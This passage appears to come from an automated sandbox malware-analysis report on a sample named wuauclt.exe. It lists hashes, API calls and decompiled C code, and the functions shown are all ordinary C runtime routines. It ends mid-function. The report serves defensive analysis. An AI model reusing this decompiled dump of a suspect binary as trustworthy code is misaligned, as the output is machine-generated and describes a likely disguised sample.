                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: csm
                                                • API String ID: 1685366865-1018135373
                                                • Opcode ID: de701f6cb5727e47b70fdbd38f07151ce7ea653632e07fb9f85a27f0095698b9
                                                • Instruction ID: ae828f296b16507ba58cd885adf9bb14490240f2192a0f783d65505970e24e62
                                                • Opcode Fuzzy Hash: de701f6cb5727e47b70fdbd38f07151ce7ea653632e07fb9f85a27f0095698b9
                                                • Instruction Fuzzy Hash: 62411830920205DBCF10DF58C885AAEBBB5AF45325F148195EC189B392D732DDBACF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0025C944,00000003,?,0025C8E4,00000003,0026F9B8,0000000C,0025CA3B,00000003,00000002), ref: 0025C9B3
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0025C9C6
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0025C944,00000003,?,0025C8E4,00000003,0026F9B8,0000000C,0025CA3B,00000003,00000002,00000000), ref: 0025C9E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9463e8f6affd5ee35b234ccc12d195641e179eea3283db73ee7b0d15755805eb
                                                • Instruction ID: 08ea4c825d8450cd44aaba97cbe5e5b8df3052b73f46f3575c5f7280be6033f3
                                                • Opcode Fuzzy Hash: 9463e8f6affd5ee35b234ccc12d195641e179eea3283db73ee7b0d15755805eb
                                                • Instruction Fuzzy Hash: E1F03131610219FFCB115F94EC0DBADBFA8EB05716F114095E809A2190DF715D94CA94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0025CDFC(signed int* __ecx, signed int __edx) {
                                                				signed int _v8;
                                                				intOrPtr* _v12;
                                                				signed int _v16;
                                                				signed int _t28;
                                                				signed int _t29;
                                                				intOrPtr _t33;
                                                				signed int _t37;
                                                				signed int _t38;
                                                				signed int _t40;
                                                				void* _t50;
                                                				signed int _t56;
                                                				intOrPtr* _t57;
                                                				signed int _t68;
                                                				signed int _t71;
                                                				signed int _t72;
                                                				signed int _t74;
                                                				signed int _t75;
                                                				signed int _t78;
                                                				signed int _t80;
                                                				signed int* _t81;
                                                				signed int _t85;
                                                				void* _t86;
                                                
                                                				_t72 = __edx;
                                                				_v12 = __ecx;
                                                				_t28 =  *__ecx;
                                                				_t81 =  *_t28;
                                                				if(_t81 != 0) {
                                                					_t29 =  *0x271004; // 0x80aab37c
                                                					_t56 =  *_t81 ^ _t29;
                                                					_t78 = _t81[1] ^ _t29;
                                                					_t83 = _t81[2] ^ _t29;
                                                					asm("ror edi, cl");
                                                					asm("ror esi, cl");
                                                					asm("ror ebx, cl");
                                                					if(_t78 != _t83) {
                                                						L14:
                                                						 *_t78 = E0025C0CC( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                                						_t33 = E002575F9(_t56);
                                                						_t57 = _v12;
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                                						_t24 = _t78 + 4; // 0x4
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E002575F9(_t24);
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E002575F9(_t83);
                                                						_t37 = 0;
                                                						L15:
                                                						return _t37;
                                                					}
                                                					_t38 = 0x200;
                                                					_t85 = _t83 - _t56 >> 2;
                                                					if(_t85 <= 0x200) {
                                                						_t38 = _t85;
                                                					}
                                                					_t80 = _t38 + _t85;
                                                					if(_t80 == 0) {
                                                						_t80 = 0x20;
                                                					}
                                                					if(_t80 < _t85) {
                                                						L9:
                                                						_push(4);
                                                						_t80 = _t85 + 4;
                                                						_push(_t80);
                                                						_v8 = E00261204(_t56);
                                                						_t40 = E0025D2F4(0);
                                                						_t68 = _v8;
                                                						_t86 = _t86 + 0x10;
                                                						if(_t68 != 0) {
                                                							goto L11;
                                                						}
                                                						_t37 = _t40 | 0xffffffff;
                                                						goto L15;
                                                					} else {
                                                						_push(4);
                                                						_push(_t80);
                                                						_v8 = E00261204(_t56);
                                                						E0025D2F4(0);
                                                						_t68 = _v8;
                                                						_t86 = _t86 + 0x10;
                                                						if(_t68 != 0) {
                                                							L11:
                                                							_t56 = _t68;
                                                							_v8 = _t68 + _t85 * 4;
                                                							_t83 = _t68 + _t80 * 4;
                                                							_t78 = _v8;
                                                							_push(0x20);
                                                							asm("ror eax, cl");
                                                							_t71 = _t78;
                                                							_v16 = 0 ^  *0x271004;
                                                							asm("sbb edx, edx");
                                                							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                                							_v8 = _t74;
                                                							if(_t74 == 0) {
                                                								goto L14;
                                                							}
                                                							_t75 = _v16;
                                                							_t50 = 0;
                                                							do {
                                                								_t50 = _t50 + 1;
                                                								 *_t71 = _t75;
                                                								_t71 = _t71 + 4;
                                                							} while (_t50 != _v8);
                                                							goto L14;
                                                						}
                                                						goto L9;
                                                					}
                                                				}
                                                				return _t28 | 0xffffffff;
                                                			}


                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 889ad5287632e9fccec060b70c5c8ec278a043ebf120d6266c71b932e6476f06
                                                • Instruction ID: 7be3e122e5074b80190d015c6982cfbc906800fc7f79f6ff5cdd809f8fdb2dc3
                                                • Opcode Fuzzy Hash: 889ad5287632e9fccec060b70c5c8ec278a043ebf120d6266c71b932e6476f06
                                                • Instruction Fuzzy Hash: F841D132A203009FCB20DF78C885A5EB7A5EF88715F254569ED15EB281E731ED15CB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E00260D36(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                				signed int _v8;
                                                				int _v12;
                                                				char _v16;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				void* _v40;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t40;
                                                				int _t46;
                                                				int _t53;
                                                				void* _t55;
                                                				int _t57;
                                                				signed int _t63;
                                                				int _t67;
                                                				short* _t68;
                                                				signed int _t69;
                                                				short* _t70;
                                                
                                                				_t34 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t34 ^ _t69;
                                                				E0025A9BC(__ebx,  &_v28, __edx, _a4);
                                                				_t57 = _a24;
                                                				if(_t57 == 0) {
                                                					_t53 =  *(_v24 + 8);
                                                					_t57 = _t53;
                                                					_a24 = _t53;
                                                				}
                                                				_t67 = 0;
                                                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                				_v12 = _t40;
                                                				if(_t40 == 0) {
                                                					L15:
                                                					if(_v16 != 0) {
                                                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                					}
                                                					return E00257097(_v8 ^ _t69, _t68);
                                                				}
                                                				_t55 = _t40 + _t40;
                                                				asm("sbb eax, eax");
                                                				if((_t55 + 0x00000008 & _t40) == 0) {
                                                					_t68 = 0;
                                                					L11:
                                                					if(_t68 != 0) {
                                                						E002596C0(_t67, _t68, _t67, _t55);
                                                						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
                                                						if(_t46 != 0) {
                                                							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
                                                						}
                                                					}
                                                					L14:
                                                					E00260E53(_t68);
                                                					goto L15;
                                                				}
                                                				asm("sbb eax, eax");
                                                				_t48 = _t40 & _t55 + 0x00000008;
                                                				_t63 = _t55 + 8;
                                                				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                					asm("sbb eax, eax");
                                                					_t68 = E0025D32E(_t63, _t48 & _t63);
                                                					if(_t68 == 0) {
                                                						goto L14;
                                                					}
                                                					 *_t68 = 0xdddd;
                                                					L9:
                                                					_t68 =  &(_t68[4]);
                                                					goto L11;
                                                				}
                                                				asm("sbb eax, eax");
                                                				E002676E0();
                                                				_t68 = _t70;
                                                				if(_t68 == 0) {
                                                					goto L14;
                                                				}
                                                				 *_t68 = 0xcccc;
                                                				goto L9;
                                                			}






















                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0025E0BD,?,00000000,?,00000001,?,?,00000001,0025E0BD,?), ref: 00260D83
                                                • __alloca_probe_16.LIBCMT ref: 00260DBB
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00260E0C
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0025BC44,?), ref: 00260E1E
                                                • __freea.LIBCMT ref: 00260E27
                                                  • Part of subcall function 0025D32E: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260DDA,00000000,?,0025BC44,?,00000008,?,0025E0BD,?,?,?), ref: 0025D360
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                • String ID:
                                                • API String ID: 1857427562-0
                                                • Opcode ID: 9d396335fa80049c547ac152a638c158950e78602ebc51931ce571e6cd5807b6
                                                • Instruction ID: 6cf31ae085a22fe58d2031b4262c538b82056dfc6c55110dd71fc5edd02f65fa
                                                • Opcode Fuzzy Hash: 9d396335fa80049c547ac152a638c158950e78602ebc51931ce571e6cd5807b6
                                                • Instruction Fuzzy Hash: C631D272A2021AABDF248F64DC85EAF7BA9EF04310F144668FC04D6150E736DDA4DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00260459() {
                                                				int _v8;
                                                				void* __ecx;
                                                				void* _t6;
                                                				int _t7;
                                                				char* _t13;
                                                				int _t17;
                                                				void* _t19;
                                                				char* _t25;
                                                				WCHAR* _t27;
                                                
                                                				_t27 = GetEnvironmentStringsW();
                                                				if(_t27 == 0) {
                                                					L7:
                                                					_t13 = 0;
                                                				} else {
                                                					_t6 = E00260422(_t27);
                                                					_pop(_t19);
                                                					_t17 = _t6 - _t27 >> 1;
                                                					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                					_v8 = _t7;
                                                					if(_t7 == 0) {
                                                						goto L7;
                                                					} else {
                                                						_t25 = E0025D32E(_t19, _t7);
                                                						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                							_t13 = 0;
                                                						} else {
                                                							_t13 = _t25;
                                                							_t25 = 0;
                                                						}
                                                						E0025D2F4(_t25);
                                                					}
                                                				}
                                                				if(_t27 != 0) {
                                                					FreeEnvironmentStringsW(_t27);
                                                				}
                                                				return _t13;
                                                			}













                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 00260462
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00260485
                                                  • Part of subcall function 0025D32E: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260DDA,00000000,?,0025BC44,?,00000008,?,0025E0BD,?,?,?), ref: 0025D360
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002604AB
                                                • _free.LIBCMT ref: 002604BE
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002604CD
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                • String ID:
                                                • API String ID: 2278895681-0
                                                • Opcode ID: 29e4403006f7ca21230a4b1da20818ef7db24d1e4b1842ee1c5bd42d1a7da164
                                                • Instruction ID: 9c86b96d05068e98dae90aa8776569bec96123e5e38a59aaa372f869a72a9d15
                                                • Opcode Fuzzy Hash: 29e4403006f7ca21230a4b1da20818ef7db24d1e4b1842ee1c5bd42d1a7da164
                                                • Instruction Fuzzy Hash: 2F01D872A213127B27311A766CCCD7B6A6DDBC3BA13148119FE08D3200EFB08C5195B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00260BAD(intOrPtr* _a4) {
                                                				intOrPtr _t6;
                                                				intOrPtr* _t21;
                                                				void* _t23;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				void* _t27;
                                                
                                                				_t21 = _a4;
                                                				if(_t21 != 0) {
                                                					_t23 =  *_t21 -  *0x272b18; // 0x272b0c
                                                					if(_t23 != 0) {
                                                						E0025D2F4(_t7);
                                                					}
                                                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x272b1c; // 0x273f08
                                                					if(_t24 != 0) {
                                                						E0025D2F4(_t8);
                                                					}
                                                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x272b20; // 0x273f08
                                                					if(_t25 != 0) {
                                                						E0025D2F4(_t9);
                                                					}
                                                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x272b48; // 0x272b10
                                                					if(_t26 != 0) {
                                                						E0025D2F4(_t10);
                                                					}
                                                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                					_t27 = _t6 -  *0x272b4c; // 0x273f0c
                                                					if(_t27 != 0) {
                                                						return E0025D2F4(_t6);
                                                					}
                                                				}
                                                				return _t6;
                                                			}











                                                APIs
                                                • _free.LIBCMT ref: 00260BC5
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 00260BD7
                                                • _free.LIBCMT ref: 00260BE9
                                                • _free.LIBCMT ref: 00260BFB
                                                • _free.LIBCMT ref: 00260C0D
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 91f7a46e97801fff4720ea439808a449139ef31a2e257c27727a30c8ea79070e
                                                • Instruction ID: 103b609860cf0704160e830bcf51b74aeaa8a23c333ae343b943910d26ec3e19
                                                • Opcode Fuzzy Hash: 91f7a46e97801fff4720ea439808a449139ef31a2e257c27727a30c8ea79070e
                                                • Instruction Fuzzy Hash: F7F06D32524202ABC630EF5CF8C6D0BB3D9AA00718B684C05F808D7952CB70FCE59E64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E0025C176(void* __ecx, void* __edx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				void* _v12;
                                                				char _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				intOrPtr* _t36;
                                                				struct HINSTANCE__* _t37;
                                                				struct HINSTANCE__* _t43;
                                                				intOrPtr* _t44;
                                                				intOrPtr* _t45;
                                                				CHAR* _t49;
                                                				struct HINSTANCE__* _t50;
                                                				void* _t52;
                                                				struct HINSTANCE__* _t55;
                                                				intOrPtr* _t59;
                                                				struct HINSTANCE__* _t64;
                                                				intOrPtr _t65;
                                                
                                                				_t52 = __ecx;
                                                				if(_a4 == 2 || _a4 == 1) {
                                                					E0026007F(_t52);
                                                					GetModuleFileNameA(0, 0x273958, 0x104);
                                                					_t49 =  *0x273a88; // 0x14b3300
                                                					 *0x273a90 = 0x273958;
                                                					if(_t49 == 0 ||  *_t49 == 0) {
                                                						_t49 = 0x273958;
                                                					}
                                                					_v8 = 0;
                                                					_v16 = 0;
                                                					E0025C29A(_t52, _t49, 0, 0,  &_v8,  &_v16);
                                                					_t64 = E0025C40F(_v8, _v16, 1);
                                                					if(_t64 != 0) {
                                                						E0025C29A(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                						if(_a4 != 1) {
                                                							_v12 = 0;
                                                							_push( &_v12);
                                                							_t50 = E0025FB9A(_t49, 0, _t64);
                                                							if(_t50 == 0) {
                                                								_t59 = _v12;
                                                								_t55 = 0;
                                                								_t36 = _t59;
                                                								if( *_t59 == 0) {
                                                									L15:
                                                									_t37 = 0;
                                                									 *0x273a7c = _t55;
                                                									_v12 = 0;
                                                									_t50 = 0;
                                                									 *0x273a80 = _t59;
                                                									L16:
                                                									E0025D2F4(_t37);
                                                									_v12 = 0;
                                                									goto L17;
                                                								} else {
                                                									goto L14;
                                                								}
                                                								do {
                                                									L14:
                                                									_t36 = _t36 + 4;
                                                									_t55 =  &(_t55->i);
                                                								} while ( *_t36 != 0);
                                                								goto L15;
                                                							}
                                                							_t37 = _v12;
                                                							goto L16;
                                                						}
                                                						 *0x273a7c = _v8 - 1;
                                                						_t43 = _t64;
                                                						_t64 = 0;
                                                						 *0x273a80 = _t43;
                                                						goto L10;
                                                					} else {
                                                						_t44 = E0025D495();
                                                						_push(0xc);
                                                						_pop(0);
                                                						 *_t44 = 0;
                                                						L10:
                                                						_t50 = 0;
                                                						L17:
                                                						E0025D2F4(_t64);
                                                						return _t50;
                                                					}
                                                				} else {
                                                					_t45 = E0025D495();
                                                					_t65 = 0x16;
                                                					 *_t45 = _t65;
                                                					E0025BA52();
                                                					return _t65;
                                                				}
                                                			}





















                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\wuauclt.exe,00000104), ref: 0025C1B6
                                                • _free.LIBCMT ref: 0025C281
                                                • _free.LIBCMT ref: 0025C28B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Users\user\Desktop\wuauclt.exe
                                                • API String ID: 2506810119-3040567212
                                                • Opcode ID: cbb507792e345d217f36dd02628cf4a09a639cdb526c80728badc3c0bda8fab7
                                                • Instruction ID: 4cdf98d1ecd14a38d88fa5bfaeaf76e36278aba2faa8bbe0f099e355013329be
                                                • Opcode Fuzzy Hash: cbb507792e345d217f36dd02628cf4a09a639cdb526c80728badc3c0bda8fab7
                                                • Instruction Fuzzy Hash: 82319271A14319EFDB21DF999C859AEBBACEB84311F204066EC08D7201E6B08E94DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E0025EB99(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				unsigned int _v20;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				char _v40;
                                                				intOrPtr _v48;
                                                				char _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* _t86;
                                                				signed int _t92;
                                                				signed int _t93;
                                                				signed int _t94;
                                                				signed int _t100;
                                                				void* _t101;
                                                				void* _t102;
                                                				void* _t104;
                                                				void* _t107;
                                                				void* _t109;
                                                				void* _t111;
                                                				void* _t115;
                                                				char* _t116;
                                                				void* _t119;
                                                				signed int _t121;
                                                				signed int _t128;
                                                				signed int* _t129;
                                                				signed int _t136;
                                                				signed int _t137;
                                                				char _t138;
                                                				signed int _t139;
                                                				signed int _t142;
                                                				signed int _t146;
                                                				signed int _t151;
                                                				char _t156;
                                                				char _t157;
                                                				void* _t161;
                                                				unsigned int _t162;
                                                				signed int _t164;
                                                				signed int _t166;
                                                				signed int _t170;
                                                				void* _t171;
                                                				signed int* _t172;
                                                				signed int _t174;
                                                				signed int _t181;
                                                				signed int _t182;
                                                				signed int _t183;
                                                				signed int _t184;
                                                				signed int _t185;
                                                				signed int _t186;
                                                				signed int _t187;
                                                
                                                				_t171 = __edx;
                                                				_t181 = _a24;
                                                				if(_t181 < 0) {
                                                					_t181 = 0;
                                                				}
                                                				_t184 = _a8;
                                                				 *_t184 = 0;
                                                				E0025A9BC(0,  &_v52, _t171, _a36);
                                                				_t5 = _t181 + 0xb; // 0xb
                                                				if(_a12 > _t5) {
                                                					_t172 = _a4;
                                                					_t142 = _t172[1];
                                                					_v36 =  *_t172;
                                                					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                						L11:
                                                						__eflags = _t142 & 0x80000000;
                                                						if((_t142 & 0x80000000) != 0) {
                                                							 *_t184 = 0x2d;
                                                							_t184 = _t184 + 1;
                                                							__eflags = _t184;
                                                						}
                                                						__eflags = _a28;
                                                						_v16 = 0x3ff;
                                                						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                						__eflags = _t172[1] & 0x7ff00000;
                                                						_v32 = _t136;
                                                						_t86 = 0x30;
                                                						if((_t172[1] & 0x7ff00000) != 0) {
                                                							 *_t184 = 0x31;
                                                							_t185 = _t184 + 1;
                                                							__eflags = _t185;
                                                						} else {
                                                							 *_t184 = _t86;
                                                							_t185 = _t184 + 1;
                                                							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                							__eflags = _t164;
                                                							if(_t164 != 0) {
                                                								_v16 = 0x3fe;
                                                							} else {
                                                								_v16 = _v16 & _t164;
                                                							}
                                                						}
                                                						_t146 = _t185;
                                                						_t186 = _t185 + 1;
                                                						_v28 = _t146;
                                                						__eflags = _t181;
                                                						if(_t181 != 0) {
                                                							_t30 = _v48 + 0x88; // 0xffce8305
                                                							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                                                						} else {
                                                							 *_t146 = 0;
                                                						}
                                                						_t92 = _t172[1] & 0x000fffff;
                                                						__eflags = _t92;
                                                						_v20 = _t92;
                                                						if(_t92 > 0) {
                                                							L23:
                                                							_t33 =  &_v8;
                                                							 *_t33 = _v8 & 0x00000000;
                                                							__eflags =  *_t33;
                                                							_t147 = 0xf0000;
                                                							_t93 = 0x30;
                                                							_v12 = _t93;
                                                							_v20 = 0xf0000;
                                                							do {
                                                								__eflags = _t181;
                                                								if(_t181 <= 0) {
                                                									break;
                                                								}
                                                								_t119 = E002676C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                								_t161 = 0x30;
                                                								_t121 = _t119 + _t161 & 0x0000ffff;
                                                								__eflags = _t121 - 0x39;
                                                								if(_t121 > 0x39) {
                                                									_t121 = _t121 + _t136;
                                                									__eflags = _t121;
                                                								}
                                                								_t162 = _v20;
                                                								_t172 = _a4;
                                                								 *_t186 = _t121;
                                                								_t186 = _t186 + 1;
                                                								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                								_t147 = _t162 >> 4;
                                                								_t93 = _v12 - 4;
                                                								_t181 = _t181 - 1;
                                                								_v20 = _t162 >> 4;
                                                								_v12 = _t93;
                                                								__eflags = _t93;
                                                							} while (_t93 >= 0);
                                                							__eflags = _t93;
                                                							if(_t93 < 0) {
                                                								goto L39;
                                                							}
                                                							_t115 = E002676C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                							__eflags = _t115 - 8;
                                                							if(_t115 <= 8) {
                                                								goto L39;
                                                							}
                                                							_t116 = _t186 - 1;
                                                							_t138 = 0x30;
                                                							while(1) {
                                                								_t156 =  *_t116;
                                                								__eflags = _t156 - 0x66;
                                                								if(_t156 == 0x66) {
                                                									goto L33;
                                                								}
                                                								__eflags = _t156 - 0x46;
                                                								if(_t156 != 0x46) {
                                                									_t139 = _v32;
                                                									__eflags = _t116 - _v28;
                                                									if(_t116 == _v28) {
                                                										_t57 = _t116 - 1;
                                                										 *_t57 =  *(_t116 - 1) + 1;
                                                										__eflags =  *_t57;
                                                									} else {
                                                										_t157 =  *_t116;
                                                										__eflags = _t157 - 0x39;
                                                										if(_t157 != 0x39) {
                                                											 *_t116 = _t157 + 1;
                                                										} else {
                                                											 *_t116 = _t139 + 0x3a;
                                                										}
                                                									}
                                                									goto L39;
                                                								}
                                                								L33:
                                                								 *_t116 = _t138;
                                                								_t116 = _t116 - 1;
                                                							}
                                                						} else {
                                                							__eflags =  *_t172;
                                                							if( *_t172 <= 0) {
                                                								L39:
                                                								__eflags = _t181;
                                                								if(_t181 > 0) {
                                                									_push(_t181);
                                                									_t111 = 0x30;
                                                									_push(_t111);
                                                									_push(_t186);
                                                									E002596C0(_t181);
                                                									_t186 = _t186 + _t181;
                                                									__eflags = _t186;
                                                								}
                                                								_t94 = _v28;
                                                								__eflags =  *_t94;
                                                								if( *_t94 == 0) {
                                                									_t186 = _t94;
                                                								}
                                                								__eflags = _a28;
                                                								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                								_t174 = _a4[1];
                                                								_t100 = E002676C0( *_a4, 0x34, _t174);
                                                								_t137 = 0;
                                                								_t151 = (_t100 & 0x000007ff) - _v16;
                                                								__eflags = _t151;
                                                								asm("sbb ebx, ebx");
                                                								if(__eflags < 0) {
                                                									L47:
                                                									 *(_t186 + 1) = 0x2d;
                                                									_t187 = _t186 + 2;
                                                									__eflags = _t187;
                                                									_t151 =  ~_t151;
                                                									asm("adc ebx, 0x0");
                                                									_t137 =  ~_t137;
                                                									goto L48;
                                                								} else {
                                                									if(__eflags > 0) {
                                                										L46:
                                                										 *(_t186 + 1) = 0x2b;
                                                										_t187 = _t186 + 2;
                                                										L48:
                                                										_t182 = _t187;
                                                										_t101 = 0x30;
                                                										 *_t187 = _t101;
                                                										__eflags = _t137;
                                                										if(__eflags < 0) {
                                                											L56:
                                                											__eflags = _t187 - _t182;
                                                											if(_t187 != _t182) {
                                                												L60:
                                                												_push(0);
                                                												_push(0xa);
                                                												_push(_t137);
                                                												_push(_t151);
                                                												_t102 = E002675E0();
                                                												_v32 = _t174;
                                                												 *_t187 = _t102 + 0x30;
                                                												_t187 = _t187 + 1;
                                                												__eflags = _t187;
                                                												L61:
                                                												_t104 = 0x30;
                                                												_t183 = 0;
                                                												__eflags = 0;
                                                												 *_t187 = _t151 + _t104;
                                                												 *(_t187 + 1) = 0;
                                                												goto L62;
                                                											}
                                                											__eflags = _t137;
                                                											if(__eflags < 0) {
                                                												goto L61;
                                                											}
                                                											if(__eflags > 0) {
                                                												goto L60;
                                                											}
                                                											__eflags = _t151 - 0xa;
                                                											if(_t151 < 0xa) {
                                                												goto L61;
                                                											}
                                                											goto L60;
                                                										}
                                                										if(__eflags > 0) {
                                                											L51:
                                                											_push(0);
                                                											_push(0x3e8);
                                                											_push(_t137);
                                                											_push(_t151);
                                                											_t107 = E002675E0();
                                                											_v32 = _t174;
                                                											 *_t187 = _t107 + 0x30;
                                                											_t187 = _t187 + 1;
                                                											__eflags = _t187 - _t182;
                                                											if(_t187 != _t182) {
                                                												L55:
                                                												_push(0);
                                                												_push(0x64);
                                                												_push(_t137);
                                                												_push(_t151);
                                                												_t109 = E002675E0();
                                                												_v32 = _t174;
                                                												 *_t187 = _t109 + 0x30;
                                                												_t187 = _t187 + 1;
                                                												__eflags = _t187;
                                                												goto L56;
                                                											}
                                                											L52:
                                                											__eflags = _t137;
                                                											if(__eflags < 0) {
                                                												goto L56;
                                                											}
                                                											if(__eflags > 0) {
                                                												goto L55;
                                                											}
                                                											__eflags = _t151 - 0x64;
                                                											if(_t151 < 0x64) {
                                                												goto L56;
                                                											}
                                                											goto L55;
                                                										}
                                                										__eflags = _t151 - 0x3e8;
                                                										if(_t151 < 0x3e8) {
                                                											goto L52;
                                                										}
                                                										goto L51;
                                                									}
